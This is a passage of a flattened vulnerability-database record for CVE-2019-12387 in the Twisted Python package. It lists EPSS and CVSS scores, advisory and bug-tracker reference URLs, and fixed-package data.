published_at 2026-04-12T12:55:00Z
4
value 0.00521
scoring_system epss
scoring_elements 0.66886
published_at 2026-04-11T12:55:00Z
5
value 0.00521
scoring_system epss
scoring_elements 0.66867
published_at 2026-04-09T12:55:00Z
6
value 0.00521
scoring_system epss
scoring_elements 0.66853
published_at 2026-04-08T12:55:00Z
7
value 0.00521
scoring_system epss
scoring_elements 0.66804
published_at 2026-04-07T12:55:00Z
8
value 0.00521
scoring_system epss
scoring_elements 0.6684
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-12387
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12387
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12387
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/advisories/GHSA-6cc5-2vg4-cc7m
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6cc5-2vg4-cc7m
7
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-128.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-128.yaml
8
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
9
reference_url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
10
reference_url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
14
reference_url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
15
reference_url https://usn.ubuntu.com/4308-1
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-1
16
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
17
reference_url https://usn.ubuntu.com/4308-2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-2
18
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
19
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
20
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1719501
reference_id 1719501
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1719501
21
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930389
reference_id 930389
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930389
22
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-12387
reference_id CVE-2019-12387
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-12387
23
reference_url https://access.redhat.com/errata/RHSA-2020:1091
reference_id RHSA-2020:1091
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1091
fixed_packages
0
url pkg:pypi/twisted@19.2.1
purl pkg:pypi/twisted@19.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-f9bv-6a83-eyb7
3
vulnerability VCID-qavz-rft9-7bfb
4
vulnerability VCID-qc7c-e5fb-77f1
5
vulnerability VCID-qtwh-as1r-6ka5
6
vulnerability VCID-rzad-s8tu-47gm
7
vulnerability VCID-szfx-665h-w3eb
8
vulnerability VCID-tec3-uqmg-tueq
9
vulnerability VCID-vcw1-fzw7-43f5
10
vulnerability VCID-vz8r-fhqf-zudf
11
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@19.2.1
aliases CVE-2019-12387, GHSA-6cc5-2vg4-cc7m, PYSEC-2019-128
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zx5n-czhy-6qgu
Fixing_vulnerabilities
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/twisted@16.3.2